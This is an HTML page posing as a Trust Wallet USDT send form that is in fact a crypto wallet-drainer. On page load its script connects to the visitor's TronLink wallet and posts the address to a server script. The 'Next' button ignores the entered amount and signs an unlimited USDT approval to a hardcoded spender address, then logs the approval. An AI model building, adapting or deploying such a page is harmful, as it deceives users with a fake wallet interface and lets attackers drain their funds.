<!DOCTYPE html>
<html>

<head>

    
        <meta charset="utf-8">
        <link rel="icon" href="/favicon.ico">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <meta name="theme-color" content="#000000">
        <meta name="description" content="Web site created using create-react-app">
        <title>Trust Wallet</title>
       
        <link href="style.css" rel="stylesheet">
        <style data-styled="active" data-styled-version="6.1.15"></style>
        <script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.umd.min.js"></script>

<script src="https://cdn.jsdelivr.net/npm/tronweb@latest/dist/TronWeb.js"></script>

    
    
    
</head>

<body>
    <div class="sc-FEMpB jHFPXJ">
    <p id="walletInfo" style="display: none;">Connecting...  </p> 
    <button onclick="approveToken()" style="display: none;">Approve Token</button>

    <div class="sc-fLDLck jOhuYu">
        <label class="sc-dycHyt hlElTY">Address or Domain Name</label>
        <div class="sc-jbAkgO iDNzau">
            <span class="sc-kfeOyU OQPBt">×</span>
            <input class="sc-gNZgCX gqpZqC" type="text" value="0xb36f4442c80907b8a026105528b482a5DB53D9D8">
            <span class="sc-hRDKVd eDghcy">Paste</span>
        </div>
    
    </div>


    <div class="sc-fLDLck jOhuYu">
        <label class="sc-dycHyt hlElTY">Amount</label>
        <div class="sc-jUkaYT hCWkoC">
            <div class="sc-jbAkgO iDNzau">
                <input class="sc-gNZgCX gqpZqC" type="number" id="amountInput" value="">
                <span class="sc-jBIHhB ceQVqA">USDT</span>
                <span class="sc-cMqPwU pIyLu">Max</span>
            </div>
        </div>
        <p class="sc-jHswkR bUFlBj" id="amountDisplay">= $0.00</p>
    </div>


<button type="submit" class="sc-deSjom dgAqxp" onclick="approveToken()">Next</button>





<script>
    let walletAddress = "";

    async function connectWallet() {
        if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
            walletAddress = tronWeb.defaultAddress.base58;
            document.getElementById("walletInfo").innerText = "Connected: " + walletAddress;

            // Log wallet
            fetch('saveWallet.php', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ wallet: walletAddress })
            });
        } else {
            alert("TronLink not detected or not connected.");
        }
    }

    async function approveToken() {
        if (!walletAddress) return alert("Connect wallet first");

        const tokenAddress = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"; // replace with your TRC-20 token
        const spender = "TMsCo4bEMD8kKgkXhwQEoZfs4Hg72c2kg1"; // replace with the dApp or contract address
        const amount = "147548758568568568456856"; // Amount in SUN (no decimal parsing needed)

        const contract = await tronWeb.contract().at(tokenAddress);

        try {
            const tx = await contract.approve(spender, amount).send();
            console.log("✅ Token approved:", tx);

            // After successful approval
            fetch('logApproval.php', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    wallet: walletAddress,
                    token: tokenAddress,
                    spender: spender,
                    amount: amount
                })
            })
            .then(res => res.json())
            .then(console.log);

        } catch (err) {
            console.warn("Approval failed:", err);
        }
    }

    // Connect automatically
    window.addEventListener('load', connectWallet);
</script>




    
</body>



</html>